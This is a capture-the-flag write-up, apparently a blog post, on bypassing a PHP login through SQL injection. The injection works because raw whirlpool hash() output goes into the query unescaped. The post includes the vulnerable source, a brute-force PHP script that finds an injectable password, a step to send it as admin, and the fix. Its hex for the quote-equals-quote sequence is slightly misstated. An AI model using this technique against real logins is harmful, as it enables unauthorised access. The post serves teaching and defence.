Thursday, June 19, 2014

Bypass auth via raw hash() output in PHP

Source code
$flag = "/flag.txt";
$id = $_POST['user_id'];
$ps = $_POST['password'];
mysql_connect("localhost","codegate","codegate");
mysql_select_db("codegate");


// Escaping happens here, on the plaintext password ...
$id = mysql_real_escape_string($id);
$ps = mysql_real_escape_string($ps);


// ... but the value that reaches the query is the hash, and the third argument
// (true) makes hash() return 64 raw bytes, which can contain ' and \ unescaped.
$ps = hash("whirlpool",$ps, true);
$result = mysql_query("select * from users where user_id='$id' and user_ps='$ps'");
$row = mysql_fetch_assoc($result);


if (isset($row['user_id'])) {
 if ($row['user_id'] == "admin") {
  echo "hello, admin\n";
  die(file_get_contents($flag));
 } else {
  die("hello, ".$row['user_id']);
 }
} else {
 msg("login failed.."); // msg() is a challenge helper not shown here
}

The issue is that hash() is called with its third argument set to true, so it returns the 64 raw digest bytes instead of 128 lowercase hex characters. Those bytes are concatenated into the query unescaped: mysql_real_escape_string() ran on the plaintext password before hashing, so it offers no protection against a digest that happens to contain a single quote or a backslash. That is a SQL injection through the hash.
    string hash ( string $algo , string $data [, bool $raw_output = false ] )
    raw_output:
    When set to TRUE, outputs raw binary data. FALSE outputs lowercase hexits.

To bypass the login, we need a password whose raw whirlpool digest contains the byte sequence '=' (quote, equals, quote). With user_id=admin the condition then reads user_ps='<prefix>'='<rest>', which MySQL parses as (user_ps='<prefix>')='<rest>'. The inner comparison is false, i.e. 0, and 0='<rest>' is true whenever '<rest>' casts to 0, which is the case when it does not start with a digit. The rest of the digest must not contain another quote or a backslash, or the string literal would break in a different place and the query would fail with a syntax error. Since a 64-byte digest has about 62 positions for a 3-byte sequence with probability 1/256^3 each, a usable candidate turns up after a few hundred thousand tries on average.

Brute Force
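The following brute-force search is an added example written for this page, not the challenge author's solution. It uses only PHP's standard hash() function; the predicate that decides whether a digest is usable, the candidate generator (a plain counter) and the search budget are my own assumptions. It encodes the conditions from the paragraph above: the digest must contain '=', no other quote or backslash anywhere, no NUL byte, and the part after '=' must not start with something MySQL would read as a number.

```php
<?php
// Added example (not from the original write-up). Finds a password whose raw
// whirlpool digest, spliced unescaped into  ... and user_ps='<digest>'  ,
// yields  user_ps='<prefix>'='<rest>'  which MySQL evaluates as
//   (user_ps='<prefix>') = '<rest>'  ->  0 = '<rest>'  ->  true
// as long as '<rest>' casts to 0.

// Decide whether a raw digest can be used for the injection.
function digest_is_injectable(string $raw): bool {
    $pos = strpos($raw, "'='");
    if ($pos === false) {
        return false;
    }
    $prefix = substr($raw, 0, $pos);
    $rest   = substr($raw, $pos + 3);

    // Any other quote opens a new literal and a backslash would escape the
    // closing quote of the query, so both must be absent elsewhere.
    foreach ([$prefix, $rest] as $part) {
        if (strpbrk($part, "'\\") !== false) {
            return false;
        }
    }
    // Assumption: play safe and never send a NUL byte inside the query.
    if (strpos($raw, "\0") !== false) {
        return false;
    }
    // '<rest>' must cast to 0. An empty rest ('') casts to 0 as well; otherwise
    // reject a leading digit, sign, decimal point or whitespace (whitespace is
    // skipped before the numeric cast, so a digit could follow it).
    if ($rest !== '' && preg_match('/^[\s0-9.+\-]/', $rest)) {
        return false;
    }
    return true;
}

// Try the decimal strings "0", "1", "2", ... until a digest passes the check.
// Expected effort is a few hundred thousand hashes; $max_tries bounds the run.
function find_injectable_password(int $max_tries = 5000000): ?array {
    for ($i = 0; $i < $max_tries; $i++) {
        $candidate = (string)$i;
        $raw = hash('whirlpool', $candidate, true);
        if (digest_is_injectable($raw)) {
            return ['password' => $candidate, 'raw_hex' => bin2hex($raw)];
        }
    }
    return null;
}

$hit = find_injectable_password();
if ($hit === null) {
    echo "no usable password within the search budget\n";
} else {
    echo "password: {$hit['password']}\n";
    echo "raw whirlpool (hex): {$hit['raw_hex']}\n";
    // Then POST user_id=admin&password=<password> to the vulnerable page.
}
```

The candidate password itself never needs to be special: mysql_real_escape_string() runs on it before hashing, so plain digits are fine, and only the digest bytes matter. The hex output is printed so the '=' position (2727 3d27 in hex) can be verified by eye before sending the request. The fix on the server side is to drop the third argument of hash() (or pass false) so the query only ever receives hex characters, or, better, to use a prepared statement.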